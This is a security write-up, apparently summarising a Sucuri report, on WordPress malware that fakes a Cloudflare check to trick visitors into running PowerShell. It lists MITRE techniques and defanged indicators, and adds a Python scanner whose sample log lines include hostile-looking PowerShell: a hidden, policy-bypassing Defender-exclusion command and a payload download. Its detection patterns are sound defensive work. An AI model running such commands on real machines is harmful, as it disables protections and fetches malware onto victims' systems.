A new variant of malware is targeting WordPress sites by mimicking a legitimate Cloudflare verification page to trick users into executing malicious PowerShell commands. This infection spreads across multiple themes and fake plugins, delivering malware in a multistage process to evade detection and maintain control. #CloudflareInfection #WordPressMalware
Key points
- The malware impersonates a Cloudflare verification page and instructs the victim to run system commands that download and execute a malicious payload.
- The infection is embedded in multiple WordPress themes, specifically injecting code into the header.php file that references a fake verification.html page.
- The attack unfolds in three stages, starting with user interaction and culminating in downloading a PowerShell payload that downloads and executes additional malicious code.
- The malicious PowerShell scripts use obfuscation and request elevated privileges to bypass antivirus detection and Windows security features.
- The final payload downloads and extracts a ZIP file containing an executable (test.exe) and adds Windows Defender exclusions to evade detection, likely delivering information stealers or remote access trojans.
- Removal is complicated because the infection is spread across multiple themes and fake plugins, making detection and cleanup challenging.
- Users are strongly advised not to follow instructions prompting them to open the Run dialog (Win + R) and execute commands, as legitimate websites will never ask for this.
MITRE Techniques
- [T1204] User Execution – The malware tricks users into running a malicious command via a fake Cloudflare human verification page (“Ask user to copy and paste a malicious command”).
- [T1086] PowerShell – The attack uses an obfuscated PowerShell script to download and execute payloads with elevated privileges (“Launches a powershell command with elevated admin privileges”).
- [T1059] Command and Scripting Interpreter – PowerShell commands download and execute secondary scripts from a remote server (“Downloads a powershell command from an external source: https://workaem[.]eth[.]limo/x.txt”).
- [T1112] Modify Registry – Adds Windows Defender exclusions likely via registry modification to avoid detection (“adds Windows Defender exclusions to avoid detection”).
- [T1105] Ingress Tool Transfer – The PowerShell script downloads additional payloads, including ZIP files and executables, from remote servers (“Downloads the ZIP file (1.zip) and executes test.exe”).
Indicators of Compromise
- [Domain] Malicious hosting domains used for delivering payloads – workaem[.]eth[.]limo
- [File] Malicious files referenced in scripts – verification.html (fake Cloudflare page), test.exe (final payload executable)
- [Script URL] Remote script URLs used for payload delivery – https://workaem[.]eth[.]limo/x.txt, https://workaem[.]eth[.]limo/load.txt
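The two places a defender can look for this campaign are the WordPress theme files (the header.php injection that references verification.html) and the endpoint's PowerShell script-block logs (the Defender-exclusion and download stages). The script below is an added example, not code from Sucuri or from the post; it wires the indicators listed above into a small scanner and runs it over constructed sample data (the header.php snippet and log lines are hypothetical, not taken from an infected site).

```python
import re

# Indicators quoted from the summary, kept defanged; refanged only at match time.
IOC_DOMAINS = ["workaem[.]eth[.]limo"]
IOC_FILES = ["verification.html", "1.zip", "test.exe"]

def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")

# Theme-side check: injected header.php code points at the fake verification page or an IoC domain.
THEME_PATTERNS = [re.compile(r"verification\.html", re.I)] + [
    re.compile(re.escape(refang(d)), re.I) for d in IOC_DOMAINS
]

# Endpoint-side check over PowerShell script-block log text (what the pasted Run-dialog command executes).
PS_PATTERNS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
    "download_cradle": re.compile(r"\b(Invoke-WebRequest|iwr|irm|DownloadString|DownloadFile)\b", re.I),
    "policy_bypass": re.compile(r"-(WindowStyle\s+Hidden|ExecutionPolicy\s+Bypass)", re.I),
    "ioc_file": re.compile("|".join(re.escape(f) for f in IOC_FILES), re.I),
    "ioc_domain": re.compile("|".join(re.escape(refang(d)) for d in IOC_DOMAINS), re.I),
}

def scan_theme_file(content: str) -> list[str]:
    """Return the matched snippets (one per pattern hit) found in a theme file such as header.php."""
    return [m.group(0) for p in THEME_PATTERNS for m in [p.search(content)] if m]

def scan_ps_line(line: str) -> set[str]:
    """Return the names of every indicator matched by one script-block log line."""
    return {name for name, pat in PS_PATTERNS.items() if pat.search(line)}

def is_suspicious(hits: set[str]) -> bool:
    """Escalate a Defender exclusion outright, or a download cradle paired with an IoC or a bypass flag."""
    return "defender_exclusion" in hits or bool(
        "download_cradle" in hits and hits & {"ioc_file", "ioc_domain", "policy_bypass"}
    )

def triage(lines: list[str]) -> list[str]:
    """Return only the log lines that should be escalated."""
    return [line for line in lines if is_suspicious(scan_ps_line(line))]

# Constructed samples (hypothetical): an injected header.php and three script-block log lines.
SAMPLE_HEADER_PHP = '<?php wp_head(); ?>\n<iframe src="/wp-content/verification.html" style="display:none"></iframe>'
SAMPLE_PS_LOG = [
    'powershell -WindowStyle Hidden -ExecutionPolicy Bypass -c "Add-MpPreference -ExclusionPath $env:TEMP"',
    "Invoke-WebRequest -Uri https://payload-host.invalid/load.txt -OutFile 1.zip",  # placeholder host
    "Get-ChildItem -Path C:\\Users -Recurse",  # benign admin activity, should not be flagged
]

if __name__ == "__main__":
    print("theme hits:", scan_theme_file(SAMPLE_HEADER_PHP))
    for flagged in triage(SAMPLE_PS_LOG):
        print("escalate:", flagged)
```

On real logs the ioc_domain pattern matches the refanged workaem domain from the list above; the sample uses a placeholder host and relies on the 1.zip file indicator instead.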

Read more: https://blog.sucuri.net/2025/05/another-fake-cloudflare-verification-targets-wordpress-sites.html